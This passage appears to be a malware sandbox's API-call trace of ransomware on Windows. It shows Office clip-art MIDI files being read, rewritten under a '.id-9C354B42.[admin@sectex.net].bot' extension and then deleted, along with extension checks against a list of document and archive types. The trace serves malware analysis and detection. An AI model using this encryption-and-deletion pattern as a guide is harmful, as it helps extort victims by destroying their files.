	[0140.330] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\jngle_01.mid.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0140.330] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\jngle_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0140.330] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.330] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.330] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\jngle_01.mid.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0140.331] GetLastError () returned 0x0
	[0140.331] ReadFile (in: hFile=0x398, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x16d3, lpOverlapped=0x0) returned 1
	[0140.356] WriteFile (in: hFile=0x3a8, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x16e0, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x16e0, lpOverlapped=0x0) returned 1
	[0140.357] ReadFile (in: hFile=0x398, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.357] WriteFile (in: hFile=0x3a8, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0140.357] SetEndOfFile (hFile=0x3a8) returned 1
	[0140.357] CloseHandle (hObject=0x3a8) returned 1
	[0140.357] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.358] SetEndOfFile (hFile=0x398) returned 1
	[0140.361] CloseHandle (hObject=0x398) returned 1
	[0140.361] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0140.367] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\jngle_01.mid")) returned 1
	[0140.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 63
	[0140.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 63
	[0140.378] lstrlenW (lpString=".doc") returned 4
	[0140.381] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.381] lstrlenW (lpString=".docx") returned 5
	[0140.382] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0140.382] lstrlenW (lpString=".pdf") returned 4
	[0140.382] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.382] lstrlenW (lpString=".xls") returned 4
	[0140.382] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.389] lstrlenW (lpString=".xlsx") returned 5
	[0140.391] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0140.391] lstrlenW (lpString=".ppt") returned 4
	[0140.391] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 63
	[0140.404] lstrlenW (lpString=".zip") returned 4
	[0140.404] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.404] lstrlenW (lpString=".rar") returned 4
	[0140.404] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.404] lstrlenW (lpString=".bz2") returned 4
	[0140.404] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.405] lstrlenW (lpString=".7z") returned 3
	[0140.405] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 63
	[0140.405] lstrlenW (lpString=".dbf") returned 4
	[0140.405] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 63
	[0140.405] lstrlenW (lpString=".1cd") returned 4
	[0140.405] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 63
	[0140.405] lstrlenW (lpString=".jpg") returned 4
	[0140.405] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 63
	[0140.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 63
	[0140.405] lstrlenW (lpString=".doc") returned 4
	[0140.405] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.405] lstrlenW (lpString=".docx") returned 5
	[0140.405] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0140.405] lstrlenW (lpString=".pdf") returned 4
	[0140.405] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.405] lstrlenW (lpString=".xls") returned 4
	[0140.405] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.405] lstrlenW (lpString=".xlsx") returned 5
	[0140.405] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0140.405] lstrlenW (lpString=".ppt") returned 4
	[0140.405] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 63
	[0140.405] lstrlenW (lpString=".zip") returned 4
	[0140.405] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.405] lstrlenW (lpString=".rar") returned 4
	[0140.405] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.405] lstrlenW (lpString=".bz2") returned 4
	[0140.405] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.405] lstrlenW (lpString=".7z") returned 3
	[0140.405] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.406] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 63
	[0140.406] lstrlenW (lpString=".dbf") returned 4
	[0140.406] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.406] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 63
	[0140.406] lstrlenW (lpString=".1cd") returned 4
	[0140.406] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.406] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 63
	[0140.406] lstrlenW (lpString=".jpg") returned 4
	[0140.406] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.406] lstrcmpiW (lpString1=".MID", lpString2=".bot") returned 1
	[0140.406] lstrlenW (lpString="PARNT_01.MID") returned 12
	[0140.406] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0140.626] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=6491) returned 1
	[0140.626] CloseHandle (hObject=0x31c) returned 1
	[0140.626] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_01.mid")) returned 0x20
	[0140.683] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_01.mid.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0140.764] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0140.778] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.778] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.778] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_01.mid.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0140.817] GetLastError () returned 0x0
	[0140.817] ReadFile (in: hFile=0x38c, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x195b, lpOverlapped=0x0) returned 1
	[0140.833] WriteFile (in: hFile=0x3ac, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x1960, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x1960, lpOverlapped=0x0) returned 1
	[0140.834] ReadFile (in: hFile=0x38c, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.834] WriteFile (in: hFile=0x3ac, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0140.834] SetEndOfFile (hFile=0x3ac) returned 1
	[0140.834] CloseHandle (hObject=0x3ac) returned 1
	[0140.834] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.834] SetEndOfFile (hFile=0x38c) returned 1
	[0140.836] CloseHandle (hObject=0x38c) returned 1
	[0140.836] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0140.910] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_01.mid")) returned 1
	[0140.910] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 63
	[0140.911] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 63
	[0140.911] lstrlenW (lpString=".doc") returned 4
	[0140.911] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.911] lstrlenW (lpString=".docx") returned 5
	[0140.911] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0140.911] lstrlenW (lpString=".pdf") returned 4
	[0140.911] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.911] lstrlenW (lpString=".xls") returned 4
	[0140.911] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.911] lstrlenW (lpString=".xlsx") returned 5
	[0140.911] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0140.911] lstrlenW (lpString=".ppt") returned 4
	[0140.911] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.911] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 63
	[0140.911] lstrlenW (lpString=".zip") returned 4
	[0140.911] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.911] lstrlenW (lpString=".rar") returned 4
	[0140.911] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.911] lstrlenW (lpString=".bz2") returned 4
	[0140.911] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.911] lstrlenW (lpString=".7z") returned 3
	[0140.911] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.911] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 63
	[0140.911] lstrlenW (lpString=".dbf") returned 4
	[0140.911] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.911] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 63
	[0140.911] lstrlenW (lpString=".1cd") returned 4
	[0140.911] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.911] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 63
	[0140.911] lstrlenW (lpString=".jpg") returned 4
	[0140.911] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.911] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 63
	[0140.911] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 63
	[0140.912] lstrlenW (lpString=".doc") returned 4
	[0140.912] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.912] lstrlenW (lpString=".docx") returned 5
	[0140.912] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0140.912] lstrlenW (lpString=".pdf") returned 4
	[0140.912] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.912] lstrlenW (lpString=".xls") returned 4
	[0140.912] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.912] lstrlenW (lpString=".xlsx") returned 5
	[0140.912] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0140.912] lstrlenW (lpString=".ppt") returned 4
	[0140.912] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.912] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 63
	[0140.912] lstrlenW (lpString=".zip") returned 4
	[0140.912] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.912] lstrlenW (lpString=".rar") returned 4
	[0140.912] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.912] lstrlenW (lpString=".bz2") returned 4
	[0140.912] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.912] lstrlenW (lpString=".7z") returned 3
	[0140.912] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.912] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 63
	[0140.912] lstrlenW (lpString=".dbf") returned 4
	[0140.912] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.912] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 63
	[0140.912] lstrlenW (lpString=".1cd") returned 4
	[0140.912] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.912] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 63
	[0140.912] lstrlenW (lpString=".jpg") returned 4
	[0140.912] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.913] lstrcmpiW (lpString1=".MID", lpString2=".bot") returned 1
	[0140.913] lstrlenW (lpString="SHOW_01.MID") returned 11
	[0140.913] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\show_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0140.913] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=6392) returned 1
	[0140.913] CloseHandle (hObject=0x3a0) returned 1
	[0140.913] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\show_01.mid")) returned 0x20
	[0140.915] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\show_01.mid.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0140.915] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\show_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0140.916] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.916] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.916] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\show_01.mid.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0140.916] GetLastError () returned 0x0
	[0140.916] ReadFile (in: hFile=0x3a0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x18f8, lpOverlapped=0x0) returned 1
	[0140.918] WriteFile (in: hFile=0x3a4, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x1900, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x1900, lpOverlapped=0x0) returned 1
	[0140.919] ReadFile (in: hFile=0x3a0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.919] WriteFile (in: hFile=0x3a4, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0140.919] SetEndOfFile (hFile=0x3a4) returned 1
	[0140.919] CloseHandle (hObject=0x3a4) returned 1
	[0140.919] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.919] SetEndOfFile (hFile=0x3a0) returned 1
	[0140.921] CloseHandle (hObject=0x3a0) returned 1
	[0140.922] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0140.922] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\show_01.mid")) returned 1
	[0140.922] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID") returned 62
	[0140.923] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID") returned 62
	[0140.923] lstrlenW (lpString=".doc") returned 4
	[0140.923] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.923] lstrlenW (lpString=".docx") returned 5
	[0140.923] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0140.923] lstrlenW (lpString=".pdf") returned 4
	[0140.923] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.923] lstrlenW (lpString=".xls") returned 4
	[0140.923] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.923] lstrlenW (lpString=".xlsx") returned 5
	[0140.923] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0140.923] lstrlenW (lpString=".ppt") returned 4
	[0140.923] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.923] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID") returned 62
	[0140.923] lstrlenW (lpString=".zip") returned 4
	[0140.923] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.923] lstrlenW (lpString=".rar") returned 4
	[0140.923] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.923] lstrlenW (lpString=".bz2") returned 4
	[0140.923] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.923] lstrlenW (lpString=".7z") returned 3
	[0140.923] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.923] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID") returned 62
	[0140.923] lstrlenW (lpString=".dbf") returned 4
	[0140.923] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.923] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID") returned 62
	[0140.923] lstrlenW (lpString=".1cd") returned 4
	[0140.923] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.923] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID") returned 62
	[0140.923] lstrlenW (lpString=".jpg") returned 4
	[0140.923] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.923] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID") returned 62
	[0140.923] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID") returned 62
	[0140.924] lstrlenW (lpString=".doc") returned 4
	[0140.924] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.924] lstrlenW (lpString=".docx") returned 5
	[0140.924] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0140.924] lstrlenW (lpString=".pdf") returned 4
	[0140.924] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.924] lstrlenW (lpString=".xls") returned 4
	[0140.924] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.924] lstrlenW (lpString=".xlsx") returned 5
	[0140.924] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0140.924] lstrlenW (lpString=".ppt") returned 4
	[0140.924] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.924] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID") returned 62
	[0140.924] lstrlenW (lpString=".zip") returned 4
	[0140.924] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.924] lstrlenW (lpString=".rar") returned 4
	[0140.924] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.924] lstrlenW (lpString=".bz2") returned 4
	[0140.924] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.924] lstrlenW (lpString=".7z") returned 3
	[0140.924] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.924] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID") returned 62
	[0140.924] lstrlenW (lpString=".dbf") returned 4
	[0140.924] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.924] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID") returned 62
	[0140.924] lstrlenW (lpString=".1cd") returned 4
	[0140.924] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.924] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID") returned 62
	[0140.924] lstrlenW (lpString=".jpg") returned 4
	[0140.924] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.924] lstrcmpiW (lpString1=".MID", lpString2=".bot") returned 1
	[0140.925] lstrlenW (lpString="SPACE_01.MID") returned 12
	[0140.925] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\space_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0140.925] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=4219) returned 1
	[0140.925] CloseHandle (hObject=0x3a0) returned 1
	[0140.925] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\space_01.mid")) returned 0x20
	[0140.925] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\space_01.mid.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
